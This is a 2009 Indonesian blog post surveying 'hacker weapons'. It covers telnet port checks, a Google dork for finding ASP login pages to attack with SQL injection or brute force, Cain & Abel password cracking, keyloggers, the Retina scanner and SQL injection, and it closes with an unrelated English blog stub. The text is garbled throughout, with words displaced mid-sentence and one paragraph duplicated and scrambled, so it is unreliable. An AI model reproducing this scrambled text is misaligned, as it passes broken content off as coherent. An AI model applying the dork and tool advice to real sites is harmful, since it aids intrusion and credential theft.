Salah satu senjata hacker yang sederhana tetapi powerful adalah telnet. Dengan menggunakan telnet, Anda dapat mengakses sebuah host dan melakukan aktivitas didalamnya, di manapun Anda berada. Telnet umumnya telah tersedia build-in pada operating system keluarga Unix/Linux maupun Windows dan menggunakan default port 23 untuk melakukan koneksi. Anda dapat melakukan koneksi melalui port yang lain dengan menuliskan nomor port yang diinginkan, misalnya port 25 untuk SMTP atau port 80 untuk HTTP. Umumnya hacker menggunakan telnet untuk mengakses router atau server. Tentu saja router dan server yang diakses akan meminta otorisasi, karena itu jangan menggunakan password default atau password yang mudah ditebak. e-mail, Kemampuan telnet memungkinkan Anda untuk mengirimkanmenciptakan shell account, melihat atau melakukan modifi kasi website, dan lain sebagainya. Perintah- perintah dalam telnet menggunakan perintah UNIX. Sebagaimanaseseorang yang ingin menyusup ke sebuah rumah, penyusup tersebut hanya bisa masuk jikaterdapat pintu atau jendela. Dalam sistem komputer, pintu, dan jendela tersebut adalah port. Sebuah komputer tanpa ada port yang terbuka ibaratnya adalah sebuah rumah tanpa pintu dan jendela. Dengan telnet, seseorang dapat menguji apakah port dengan nomortertentu dalam keadaan open, hanya dengan mengetikkan telnet namaserver nomor_port. Contohnya jika Anda mengetikkan telnet domaintarget.com 25, perhatikan respon yang tampil, jika telnet hanya menampilkan pesan koneksi gagal, maka port 25 tidak tersedia untukdiakses secara remote.


Search Engine

Google Hacking proses hacking google. com, Jika Anda memiliki website yang tiba-tiba di-hack oleh seseorang, jangan langsung menuduhpelakunya adalah pemilik warung kopi dimana Anda sering berhutang, siapapunberkesempatan menemukan website Anda melalui Internet search engine seperti Google, Yahoo!, Altavista, dan lain sebagainya. Khususnya yang cukup banyak mendapat sorotanadalah Google, bahkan kombinasi perintah yang disediakan Google telah menciptakan istilahkarena kemampuannya menampilkan informasiinformasi yang mendukungtersebut. Salah satu contoh sederhana, ketikkan perintah inurl:login.asp padamaka dalam sekejap akan ditampilkan jutaan halaman yang mengandunglogin.asp pada URLnya. Lalu dimana bahayanya? Login.asp adalah penamaan file yang umum untuk melakukan loginpada website dengan bahasa ASP (Active Server Pages ), dengan menemukan URL tersebut, ibaratnya seseorang telah menemukan pintu masuk untuk memperoleh akses yang lebih tinggipada website Anda. Dengan mencoba teknik seperti SQL Injection, mencoba username dan password yang umum, brute force , dan bermacam teknik lainnya, maka jangan heran jikaAnda memiliki statistik kunjungan halaman web Anda, kemudian mendapatkan halaman yang paling sering diakses adalah login. asp! Tentunya Anda perlu berhati-hati jika mendapatkan hal seperti ini.

Web Tools

Seseorang yang bermaksud buruk tidak ingin identitasnya diketahui, dan mungkinmenggunakan proxy luar agar jejaknya sukar dilacak. Cara lainnya mungkin ia akan menujusebuah warnet dan menjalankan aksinya. Kalau membayangkan seorang hacker sedangberjalan menuju warnet, mungkin Anda membayangkan hacker tersebut telah menyimpanberbagai tools supercanggih didalam flash disk yang akan dijalankannya pada komputerwarnet. Tetapi ternyata tidak selalu harus demikian, jika semua yang dibutuhkan hacker tersebut telah tersedia di Internet. Beberapa website telah hadir sebagai tools untukmenjalankan aksi yang diinginkan hacke.


Cain & Abel

Cain & Abel merupakan suatu aplikasi desktop berbasis Windows, memiliki tujuan utama untuk recovery password dengan berbagai metode, seperti packet sniffing, dictionary attack, brute attack, ataupun cryptanalysis. Attack Walaupun diklaim oleh pembuatnya bahwa Cain & Abel tidak mengandung malware, tetapi beberapa anti virus mendeteksi Cain & Abel sebagai malware bernama Win32: Cain-B [Tool]. Kemampuan lain dari Cain & Abel adalah mampu melihat password di belakang karakter asterisk, VoIP Filtering, dan masih banyak lagi yang membuat Cain & Abel merupakan salah satu tools terlengkap yang dapat Anda peroleh secara gratis saat ini.


KeyLogger

diam-diam Bayangkan jika setiap penekanan tombol keyboard yang Anda lakukan terekam denganuntuk kemudian dilihat oleh seseorang, tentu hal yang menjengkelkan, bukan? Hal inilah yang dilakukan tools dalam kategori keylogger. Cukup banyak software kategorikeylogger yang dapat Anda dapatkan di Internet dengan nama-nama yang aneh dan seram. Bayangkan apa akibat yang dapat terjadi jika sebuah software keylogger beraksi, mungkinAnda tanpa sengaja telah menyerahkan nomor kartu kredit, password e-mail, surat cinta, curhat, dan apapun yang telah Anda ketikkan pada keyboard Pada umumnya program keylogger akan bersembunyi pada background sehingga tidak mudah dideteksi keberadaannya setiap penekanan tombol keyboard direkam dalam sebuah fi le ataupun dikirimkan padapemasang program. Jika komputer yang digunakan bukan komputer Anda, tentu mudah untuk memasang program keylogger.


Retina

Retina merupakan tools untuk melakukan scan terhadap vulnerability sebuah system komputer, informasi vulnerability yang ditampilkan Retina tergolong cukup lengkap, bahkanpada beberapa bagian Retina juga menyediakan solusinya. Anda dapat menjalankan Retina untuk melakukan scan pada sebuah domain Internet ataupun komputer pada LAN.


Senjata utama

Tidak mungkin membahas secara komplit seluruh tools yang tersedia,tetapi seorang hacker memiliki satu “tools” atau senjata utama yang unik. Tools yang paling sulit sekaligus senjata utama hacker adalah kreativitas. Tentunya kreativitas harus didukung oleh pengetahuan dan wawasan agar selalu berkembang, sering kali vulnerability senjata utamaunik. Tools yang paling sulit sekaligus senjata utama hacker adalah kreativitas. Tentunyakreativitas harus didukung oleh pengetahuan dan wawasan agar selalu berkembang, sering kaliatau kelemahan baru pada sistem ditemukan karena kreativitas dan kegigihan hacker yang mampu memanfaatkan kesalahan pemrograman atau bugs agar database sistemtersebut. Contohnya adalah teknik SQL Injection, yang memanfaatkan kesalahanpemrograman yang tidak melakukan validasi terhadap input, sehingga input dapat dimanipulasimelaksanakan instruksi yang dikehendari hacker. Anda dapat membayangkanbetapa kreatif dan luas pengetahuan sang penemu SQL Injection yang kali pertama.

Selasa, 10 Maret 2009

experience

the 1st time we make this blog,we are so happy cause its need longtime....
and finally we get it.